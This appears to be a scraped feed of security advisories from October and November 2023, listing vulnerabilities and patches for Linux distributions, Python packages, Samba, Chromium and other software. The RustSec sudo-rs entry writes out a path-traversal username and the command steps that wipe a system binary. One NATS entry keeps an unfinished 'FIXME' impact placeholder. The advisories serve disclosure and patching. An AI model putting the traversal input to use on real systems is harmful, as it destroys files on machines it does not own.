Auto Updating Security Advisories Database

Security Advisories

Data	Category	Title	Description	Link
30.10.2023 12:06:58	ubuntu	[USN-6457-1] Node.js vulnerabilities	Several security issues were fixed in Node.js.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6457-1
30.10.2023 05:32:45	ubuntu	[USN-6456-1] Firefox vulnerabilities	Several security issues were fixed in Firefox.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6456-1
30.10.2023 02:00:00	gentoo	[GLSA-202310-17] UnZip: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in UnZip, the worst of which could lead to code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202310-17
30.10.2023 02:00:00	gentoo	[GLSA-202310-18] Rack: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in Rack, the worst of which can lead to sequence injection in logging compontents.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202310-18
30.10.2023 02:00:00	gentoo	[GLSA-202310-19] Dovecot: Privilege Escalation (normal)	A vulnerability has been discovered in Dovecot that can lead to a privilege escalation when master and non-master passdbs are used.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202310-19
30.10.2023 02:00:00	gentoo	[GLSA-202310-20] rxvt-unicode: Arbitrary Code Execution (high)	A vulnerability has been discovered in rxvt-unicode where data written to the terminal can lead to code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202310-20
29.10.2023 07:01:23	opensuse	[openSUSE-SU-2023:0338-1] Security update for opera (important)	Security update for opera	https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0338-1
29.10.2023 07:01:20	opensuse	[openSUSE-SU-2023:0337-1] Security update for opera (important)	Security update for opera	https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0337-1
01.11.2023 00:42:00	ubuntu	[USN-6454-3] Linux kernel (ARM laptop) vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6454-3
31.10.2023 23:47:40	ubuntu	[USN-6466-1] Linux kernel (NVIDIA) vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6466-1
31.10.2023 23:14:14	ubuntu	[USN-6464-1] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6464-1
31.10.2023 23:07:14	ubuntu	[USN-6465-1] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6465-1
31.10.2023 19:15:23	alpinelinux	[ALPINE:CVE-2023-43796] synapse vulnerability	[From CVE-2023-43796] Synapse is an open-source Matrix homeserver Prior to versions 1.95.1 and 1.96.0rc1, cached device information of remote users can be queried from Synapse. This can be used to enumerate the remote users known to a homeserver. System administrators are encouraged to upgrade to Synapse 1.95.1 or 1.96.0rc1 to receive a patch. As a workaround, the `federation_domain_whitelist` can be used to limit federation traffic with a homeserver.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-43796
31.10.2023 17:16:46	ubuntu	[USN-6453-2] X.Org X Server vulnerabilities	Several security issues were fixed in X.Org X Server, xwayland.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6453-2
31.10.2023 16:47:07	ubuntu	[USN-6463-1] Open VM Tools vulnerabilities	Several security issues were fixed in Open VM Tools.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6463-1
31.10.2023 16:45:57	ubuntu	[USN-6462-1] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6462-1
31.10.2023 14:51:27	ubuntu	[USN-6461-1] Linux kernel (OEM) vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6461-1
31.10.2023 02:15:09	alpinelinux	[ALPINE:CVE-2023-46129] nats-server vulnerability	[From CVE-2023-46129] NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing. The cryptographic key handling library, nkeys, recently gained support for encryption, not just for signing/authentication. This is used in nats-server 2.10 (Sep 2023) and newer for authentication callouts. In nkeys versions 0.4.0 through 0.4.5, corresponding with NATS server versions 2.10.0 through 2.10.3, the nkeys library's `xkeys` encryption handling logic mistakenly passed an array by value into an internal function, where the function mutated that buffer to populate the encryption key to use. As a result, all encryption was actually to an all-zeros key. This affects encryption only, not signing. FIXME: FILL IN IMPACT ON NATS-SERVER AUTH CALLOUT SECURITY. nkeys Go library 0.4.6, corresponding with NATS Server 2.10.4, has a patch for this issue. No known workarounds are available. For any application handling auth callouts in Go, if using the nkeys library, update the dependency, recompile and deploy that in lockstep.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-46129
31.10.2023 02:00:00	gentoo	[GLSA-202310-21] ConnMan: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in ConnMan, the worst of which can lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202310-21
31.10.2023 02:00:00	gentoo	[GLSA-202310-22] Salt: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in Salt, the worst of which could result in local privilege escalation.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202310-22
31.10.2023 02:00:00	gentoo	[GLSA-202310-23] libxslt: Multiple Vulnerabilities (high)	Several use-after-free vulnerabilities have been found in libxslt.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202310-23
31.10.2023 02:00:00	vmware	[VMSA-2023-0025] VMware Workspace ONE UEM console updates address an open redirect vulnerability (CVE-2023-20886) (important)		https://secdb.nttzen.cloud/security-advisory/detail/VMSA-2023-0025
31.10.2023 10:52:39	almalinux	[ALSA-2023:6167] libguestfs-winsupport security update (low)	libguestfs-winsupport security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6167
31.10.2023 22:23:51	pypi	[PYSEC-2023-219] wagtail vulnerability	Wagtail is an open source content management system built on Django. A user with a limited-permission editor account for the Wagtail admin can make a direct URL request to the admin view that handles bulk actions on user accounts. While authentication rules prevent the user from making any changes, the error message discloses the display names of user accounts, and by modifying URL parameters, the user can retrieve the display name for any user. The vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin. Patched versions have been released as Wagtail 4.1.8 (LTS), 5.0.5 and 5.1.3. The fix is also included in Release Candidate 1 of the forthcoming Wagtail 5.2 release. Users are advised to upgrade. There are no known workarounds for this vulnerability.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-219
01.11.2023 23:27:02	ubuntu	[USN-6454-4] Linux kernel (StarFive) vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6454-4
01.11.2023 14:39:24	ubuntu	[USN-6465-2] Linux kernel (Raspberry Pi) vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6465-2
01.11.2023 13:26:31	ubuntu	[USN-6467-1] Kerberos vulnerability	Kerberos could be made to crash if it received specially craftednetwork traffic.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6467-1
01.11.2023 11:29:41	ubuntu	[USN-6403-3] libvpx vulnerabilities	Several security issues were fixed in libvpx.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6403-3
01.11.2023 02:00:00	gentoo	[GLSA-202311-01] GitPython: Code Execution via Crafted Input (high)	A vulnerability has been discovered in GitPython where crafted input to Repo.clone_from can lead to code execution	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-01
01.11.2023 02:00:00	gentoo	[GLSA-202311-02] Netatalk: Multiple Vulnerabilities including root remote code execution (high)	Multiple vulnerabilities have been discovered in Netatalk, which could lead to remote code execution	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202311-02
01.11.2023 13:40:08	rubysec	[RUBYSEC:RMAGICK-2023-5349] memory leak flaw was found in ruby-magick (medium)	A memory leak flaw was found in ruby-magick, an interface betweenRuby and ImageMagick. This issue can lead to a denial of service(DOS) by memory exhaustion.	https://secdb.nttzen.cloud/security-advisory/detail/RUBYSEC:RMAGICK-2023-5349
01.11.2023 20:30:02	pypi	[PYSEC-2023-220] nautobot vulnerability	Nautobot is a Network Automation Platform built as a web application atop the Django Python framework with a PostgreSQL or MySQL database. In Nautobot 2.0.x, certain REST API endpoints, in combination with the `?depth=<N>` query parameter, can expose hashed user passwords as stored in the database to any authenticated user with access to these endpoints. The passwords are not exposed in plaintext. This vulnerability has been patched in version 2.0.3.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-220
01.11.2023 20:30:03	pypi	[PYSEC-2023-221] werkzeug vulnerability	Werkzeug is a comprehensive WSGI web application library. If an upload of a file that starts with CR or LF and then is followed by megabytes of data without these characters: all of these bytes are appended chunk by chunk into internal bytearray and lookup for boundary is performed on growing buffer. This allows an attacker to cause a denial of service by sending crafted multipart data to an endpoint that will parse it. The amount of CPU time required can block worker processes from handling legitimate requests. This vulnerability has been patched in version 3.0.1.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-221
02.11.2023 22:36:08	ubuntu	[USN-6471-1] libsndfile vulnerability	libsndfile could be made to crash if it received specially craftedinput.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6471-1
02.11.2023 12:20:42	ubuntu	[USN-6469-1] xrdp vulnerability	xrdp could be made to crash or run programs if it receivedspecially crafted network traffic.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6469-1
02.11.2023 11:23:47	ubuntu	[USN-6470-1] Axis vulnerability	Axis could be made to crash or execute arbitrary code if it received speciallycrafted input.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6470-1
02.11.2023 09:00:00	msrc	[MS:CVE-2023-36034] Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability (moderate)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36034
02.11.2023 09:00:00	msrc	[MS:CVE-2023-36029] Microsoft Edge (Chromium-based) Spoofing Vulnerability (moderate)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36029
02.11.2023 09:00:00	msrc	[MS:CVE-2023-36022] Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability (moderate)		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36022
02.11.2023 09:00:00	msrc	[MS:CVE-2023-5480] Chromium: CVE-2023-5480 Inappropriate implementation in Payments		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5480
02.11.2023 09:00:00	msrc	[MS:CVE-2023-5482] Chromium: CVE-2023-5482 Insufficient data validation in USB		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5482
02.11.2023 09:00:00	msrc	[MS:CVE-2023-5849] Chromium: CVE-2023-5849 Integer overflow in USB		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5849
02.11.2023 09:00:00	msrc	[MS:CVE-2023-5850] Chromium: CVE-2023-5850 Incorrect security UI in Downloads		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5850
02.11.2023 09:00:00	msrc	[MS:CVE-2023-5851] Chromium: CVE-2023-5851 Inappropriate implementation in Downloads		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5851
02.11.2023 09:00:00	msrc	[MS:CVE-2023-5852] Chromium: CVE-2023-5852 Use after free in Printing		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5852
02.11.2023 09:00:00	msrc	[MS:CVE-2023-5853] Chromium: CVE-2023-5853 Incorrect security UI in Downloads		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5853
02.11.2023 09:00:00	msrc	[MS:CVE-2023-5854] Chromium: CVE-2023-5854 Use after free in Profiles		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5854
02.11.2023 09:00:00	msrc	[MS:CVE-2023-5855] Chromium: CVE-2023-5855 Use after free in Reading Mode		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5855
02.11.2023 09:00:00	msrc	[MS:CVE-2023-5856] Chromium: CVE-2023-5856 Use after free in Side Panel		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5856
02.11.2023 09:00:00	msrc	[MS:CVE-2023-5857] Chromium: CVE-2023-5857 Inappropriate implementation in Downloads		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5857
02.11.2023 09:00:00	msrc	[MS:CVE-2023-5858] Chromium: CVE-2023-5858 Inappropriate implementation in WebApp Provider		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5858
02.11.2023 09:00:00	msrc	[MS:CVE-2023-5859] Chromium: CVE-2023-5859 Incorrect security UI in Picture In Picture		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-5859
02.11.2023 12:30:06	pypi	[PYSEC-2023-222] django vulnerability	An issue was discovered in Django 3.2 before 3.2.23, 4.1 before 4.1.13, and 4.2 before 4.2.7. The NFKC normalization is slow on Windows. As a consequence, django.contrib.auth.forms.UsernameField is subject to a potential DoS (denial of service) attack via certain inputs with a very large number of Unicode characters.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-222
02.11.2023 12:30:07	pypi	[PYSEC-2023-223] transmute-core vulnerability	Unsafe YAML deserialization in yaml.Loader in transmute-core before 1.13.5 allows attackers to execute arbitrary Python code.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-223
02.11.2023 05:30:29	ubuntu	[USN-6468-1] Thunderbird vulnerabilities	Several security issues were fixed in Thunderbird.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6468-1
02.11.2023 18:33:16	pypi	[PYSEC-2023-224] twisted vulnerability	Twisted is an event-based framework for internet applications. Prior to version 23.10.0rc1, when sending multiple HTTP requests in one TCP packet, twisted.web will process the requests asynchronously without guaranteeing the response order. If one of the endpoints is controlled by an attacker, the attacker can delay the response on purpose to manipulate the response of the second request when a victim launched two requests using HTTP pipeline. Version 23.10.0rc1 contains a patch for this issue.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-224
03.11.2023 15:15:08	alpinelinux	[ALPINE:CVE-2023-3961] samba vulnerability	[From CVE-2023-3961] A path traversal vulnerability was identified in Samba when processing client pipe names connecting to Unix domain sockets within a private directory. Samba typically uses this mechanism to connect SMB clients to remote procedure call (RPC) services like SAMR LSA or SPOOLSS, which Samba initiates on demand. However, due to inadequate sanitization of incoming client pipe names, allowing a client to send a pipe name containing Unix directory traversal characters (../). This could result in SMB clients connecting as root to Unix domain sockets outside the private directory. If an attacker or client managed to send a pipe name resolving to an external service using an existing Unix domain socket, it could potentially lead to unauthorized access to the service and consequential adverse events, including compromise or service crashes.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-3961
03.11.2023 10:15:08	alpinelinux	[ALPINE:CVE-2023-4091] samba vulnerability	[From CVE-2023-4091] A vulnerability was discovered in Samba, where the flaw allows SMB clients to truncate files, even with read-only permissions when the Samba VFS module "acl_xattr" is configured with "acl_xattr:ignore system acls = yes". The SMB protocol allows opening files when the client requests read-only access but then implicitly truncates the opened file to 0 bytes if the client specifies a separate OVERWRITE create disposition request. The issue arises in configurations that bypass kernel file system permissions checks, relying solely on Samba's permissions.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-4091
03.11.2023 10:15:07	alpinelinux	[ALPINE:CVE-2023-42670] samba vulnerability	[From CVE-2023-42670] A flaw was found in Samba. It is susceptible to a vulnerability where multiple incompatible RPC listeners can be initiated, causing disruptions in the AD DC service. When Samba's RPC server experiences a high load or unresponsiveness, servers intended for non-AD DC purposes (for example, NT4-emulation "classic DCs") can erroneously start and compete for the same unix domain sockets. This issue leads to partial query responses from the AD DC, causing issues such as "The procedure number is out of range" when using tools like Active Directory Users. This flaw allows an attacker to disrupt AD DC services.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-42670
03.11.2023 07:15:30	alpinelinux	[ALPINE:CVE-2023-43665] py3-django vulnerability	[From CVE-2023-43665] In Django 3.2 before 3.2.22, 4.1 before 4.1.12, and 4.2 before 4.2.6, the django.utils.text.Truncator chars() and words() methods (when used with html=True) are subject to a potential DoS (denial of service) attack via certain inputs with very long, potentially malformed HTML text. The chars() and words() methods are used to implement the truncatechars_html and truncatewords_html template filters, which are thus also vulnerable. NOTE: this issue exists because of an incomplete fix for CVE-2019-14232.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-43665
03.11.2023 07:15:29	alpinelinux	[ALPINE:CVE-2023-41164] py3-django vulnerability	[From CVE-2023-41164] In Django 3.2 before 3.2.21, 4.1 before 4.1.11, and 4.2 before 4.2.5, django.utils.encoding.uri_to_iri() is subject to a potential DoS (denial of service) attack via certain inputs with a very large number of Unicode characters.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-41164
03.11.2023 12:29:40	pypi	[PYSEC-2023-225] django vulnerability	In Django 3.2 before 3.2.21, 4.1 before 4.1.11, and 4.2 before 4.2.5, django.utils.encoding.uri_to_iri() is subject to a potential DoS (denial of service) attack via certain inputs with a very large number of Unicode characters.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-225
03.11.2023 12:29:40	pypi	[PYSEC-2023-226] django vulnerability	In Django 3.2 before 3.2.22, 4.1 before 4.1.12, and 4.2 before 4.2.6, the django.utils.text.Truncator chars() and words() methods (when used with html=True) are subject to a potential DoS (denial of service) attack via certain inputs with very long, potentially malformed HTML text. The chars() and words() methods are used to implement the truncatechars_html and truncatewords_html template filters, which are thus also vulnerable. NOTE: this issue exists because of an incomplete fix for CVE-2019-14232.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-226
03.11.2023 12:29:41	pypi	[PYSEC-2023-227] pillow vulnerability	An issue was discovered in Pillow before 10.0.0. It is a Denial of Service that uncontrollably allocates memory to process a given task, potentially causing a service to crash by having it run out of memory. This occurs for truetype in ImageFont when textlength in an ImageDraw instance operates on a long text argument.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-227
03.11.2023 12:25:10	almalinux	[ALSA-2023:6265] ghostscript security update (important)	ghostscript security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6265
03.11.2023 12:35:00	almalinux	[ALSA-2023:6266] squid security update (critical)	squid security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6266
03.11.2023 13:04:44	almalinux	[ALSA-2023:6246] .NET 7.0 security update (moderate)	.NET 7.0 security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6246
03.11.2023 12:06:21	almalinux	[ALSA-2023:6242] .NET 6.0 security update (moderate)	.NET 6.0 security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6242
03.11.2023 11:22:48	almalinux	[ALSA-2023:6188] firefox security update (important)	firefox security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6188
03.11.2023 11:28:28	almalinux	[ALSA-2023:6191] thunderbird security update (important)	thunderbird security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:6191
03.11.2023 18:28:41	pypi	[PYSEC-2023-228] pip vulnerability	When installing a package from a Mercurial VCS URL (ie "pip install hg+...") with pip prior to v23.3, the specified Mercurial revision could be used to inject arbitrary configuration options to the "hg clone" call (ie "--config"). Controlling the Mercurial configuration can modify how and which repository is installed. This vulnerability does not affect users who aren't installing from Mercurial.	https://secdb.nttzen.cloud/security-advisory/detail/PYSEC-2023-228
04.11.2023 01:01:11	opensuse	[openSUSE-SU-2023:0350-1] Security update for rubygem-activesupport-5.2 (moderate)	Security update for rubygem-activesupport-5.2	https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0350-1
04.11.2023 11:00:12	opensuse	[openSUSE-SU-2023:0354-1] Security update for opera (important)	Security update for opera	https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0354-1
04.11.2023 11:00:06	opensuse	[openSUSE-SU-2023:0353-1] Security update for opera (important)	Security update for opera	https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0353-1
04.11.2023 10:59:57	opensuse	[openSUSE-SU-2023:0352-1] Security update for virtualbox (important)	Security update for virtualbox	https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0352-1
04.11.2023 10:59:52	opensuse	[openSUSE-SU-2023:0351-1] Security update for virtualbox (important)	Security update for virtualbox	https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0351-1
06.11.2023 11:36:15	ubuntu	[USN-6467-2] Kerberos vulnerability	Kerberos could be made to crash if it received specially craftednetwork traffic.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6467-2
06.11.2023 09:15:09	alpinelinux	[ALPINE:CVE-2023-42669] samba vulnerability	[From CVE-2023-42669] A vulnerability was found in Samba's "rpcecho" development server, a non-Windows RPC server used to test Samba's DCE/RPC stack elements. This vulnerability stems from an RPC function that can be blocked indefinitely. The issue arises because the "rpcecho" service operates with only one worker in the main RPC task, allowing calls to the "rpcecho" server to be blocked for a specified time, causing service disruptions. This disruption is triggered by a "sleep()" call in the "dcesrv_echo_TestSleep()" function under specific conditions. Authenticated users or attackers can exploit this vulnerability to make calls to the "rpcecho" server, requesting it to block for a specified duration, effectively disrupting most services and leading to a complete denial of service on the AD DC. The DoS affects all other services as "rpcecho" runs in the main RPC task.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-42669
06.11.2023 14:48:19	rustsec	[RUSTSEC-2023-0069] sudo-rs: Path Traversal vulnerability	## ImpactAn issue was discovered where usernames containing the . and / characters could result in the corruption of specific files on the filesystem. As usernames are generally not limited by the characters they can contain, a username appearing to be a relative path can be constructed. For example we could add a user to the system containing the username ../../../../bin/cp. When logged in as a user with that name, that user could run sudo -K to clear their session record file. The session code then constructs the path to the session file by concatenating the username to the session file storage directory, resulting in a resolved path of /bin/cp. The code then clears that file, resulting in the cp binary effectively being removed from the system.An attacker needs to be able to login as a user with a constructed username. Given that such a username is unlikely to exist on an existing system, they will also need to be able to create the users with the constructed usernames.## PatchesThe bug is fixed in version 0.2.1 of sudo-rs. Sudo-rs now uses the uid for the user instead of their username for determining the filename. Note that an upgrade to this version will result in existing session files being ignored and users will be forced to re-authenticate. It also fully eliminates any possibility of path traversal, given that uids are always integer values.The issue was corrected in commit `bfdbda22968e3de43fa8246cab1681cfd5d5493d`.	https://secdb.nttzen.cloud/security-advisory/detail/RUSTSEC-2023-0069
07.11.2023 22:03:49	slackware	[SSA:2023-311-01] sudo	New sudo packages are available for Slackware 14.0, 14.1, 14.2, 15.0,and -current to fix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/sudo-1.9.15-i586-1_slack15.0.txz: Upgraded. The sudoers plugin has been modified to make it more resilient to ROWHAMMER attacks on authentication and policy matching. The sudoers plugin now constructs the user time stamp file path name using the user-ID instead of the user name. This avoids a potential problem with user names that contain a path separator ('/') being interpreted as part of the path name. For more information, see: https://www.cve.org/CVERecord?id=CVE-2023-42465 https://www.cve.org/CVERecord?id=CVE-2023-42456 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 14.0:ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/sudo-1.9.15-i486-1_slack14.0.txzUpdated package for Slackware x86_64 14.0:ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/sudo-1.9.15-x86_64-1_slack14.0.txzUpdated package for Slackware 14.1:ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/sudo-1.9.15-i486-1_slack14.1.txzUpdated package for Slackware x86_64 14.1:ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/sudo-1.9.15-x86_64-1_slack14.1.txzUpdated package for Slackware 14.2:ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/sudo-1.9.15-i586-1_slack14.2.txzUpdated package for Slackware x86_64 14.2:ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/sudo-1.9.15-x86_64-1_slack14.2.txzUpdated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/sudo-1.9.15-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/sudo-1.9.15-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/sudo-1.9.15-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/ap/sudo-1.9.15-x86_64-1.txzMD5 signaturesSlackware 14.0 package:41eaa419c635bcc57b5fbdc5721bb35f sudo-1.9.15-i486-1_slack14.0.txzSlackware x86_64 14.0 package:414ed3ca815363445f81161872cf8fc9 sudo-1.9.15-x86_64-1_slack14.0.txzSlackware 14.1 package:2d6c30e0c80a8ee87d2598df5df56dc8 sudo-1.9.15-i486-1_slack14.1.txzSlackware x86_64 14.1 package:0a42f5a17f76f2c38bfdd6f654dd1360 sudo-1.9.15-x86_64-1_slack14.1.txzSlackware 14.2 package:1d5b5d3432033dea48549612546a5aa4 sudo-1.9.15-i586-1_slack14.2.txzSlackware x86_64 14.2 package:eb20f940540160ad2f9fc8ac4aa90a39 sudo-1.9.15-x86_64-1_slack14.2.txzSlackware 15.0 package:816e1d885ff9c4f3f241cd7601f9c476 sudo-1.9.15-i586-1_slack15.0.txzSlackware x86_64 15.0 package:8274b3b03bd735ca8ae14a6c3a658127 sudo-1.9.15-x86_64-1_slack15.0.txzSlackware -current package:893214566e3e9dbeb80bae0a0b08ec20 ap/sudo-1.9.15-i586-1.txzSlackware x86_64 -current package:8788eee56c97fde7df4f02dc9d22673c ap/sudo-1.9.15-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg sudo-1.9.15-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-311-01
07.11.2023 16:20:04	ubuntu	[USN-6473-1] urllib3 vulnerabilities	Several security issues were fixed in urllib3.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6473-1
07.11.2023 09:58:02	ubuntu	[USN-6472-1] GNU Scientific Library vulnerability	GNU Scientific Library could be made to crash or execute arbitrary code if itreceived specially crafted input.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6472-1
07.11.2023 02:00:00	cisa	[CISA-2023:1107] CISA Adds One Known Exploited Vulnerability to Catalog	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/detail/CISA-2023:1107
06.11.2023 20:15:08	alpinelinux	[ALPINE:CVE-2023-44398] exiv2 vulnerability	[From CVE-2023-44398] Exiv2 is a C++ library and a command-line utility to read, write, delete and modify Exif, IPTC, XMP and ICC image metadata. An out-of-bounds write was found in Exiv2 version v0.28.0. The vulnerable function, `BmffImage::brotliUncompress`, is new in v0.28.0, so earlier versions of Exiv2 are _not_ affected. The out-of-bounds write is triggered when Exiv2 is used to read the metadata of a crafted image file. An attacker could potentially exploit the vulnerability to gain code execution, if they can trick the victim into running Exiv2 on a crafted image file. This bug is fixed in version v0.28.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-44398
06.11.2023 17:51:39	suse	[SUSE-SU-2023:4381-1] Security update for squid (important)	Security update for squid	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4381-1
06.11.2023 17:51:25	suse	[SUSE-SU-2023:4380-1] Security update for squid (important)	Security update for squid	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4380-1
06.11.2023 15:55:21	suse	[SUSE-SU-2023:4378-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4378-1
06.11.2023 14:53:28	suse	[SUSE-SU-2023:4377-1] Security update for the Linux Kernel (important)	Security update for the Linux Kernel	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4377-1
06.11.2023 14:52:09	suse	[SUSE-SU-2023:4376-1] Security update for redis (important)	Security update for redis	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4376-1
08.11.2023 02:00:00	cisa	[CISA-2023:1108] CISA Adds One Known Exploited Vulnerability to Catalog	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/detail/CISA-2023:1108
07.11.2023 22:15:08	alpinelinux	[ALPINE:CVE-2023-4154] samba vulnerability	[From CVE-2023-4154] A design flaw was found in Samba's DirSync control implementation, which exposes passwords and secrets in Active Directory to privileged users and Read-Only Domain Controllers (RODCs). This flaw allows RODCs and users possessing the GET_CHANGES right to access all attributes, including sensitive secrets and passwords. Even in a default setup, RODC DC accounts, which should only replicate some passwords, can gain access to all domain secrets, including the vital krbtgt, effectively eliminating the RODC / DC distinction. Furthermore, the vulnerability fails to account for error conditions (fail open), like out-of-memory situations, potentially granting access to secret attributes, even under low-privileged attacker influence.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-4154
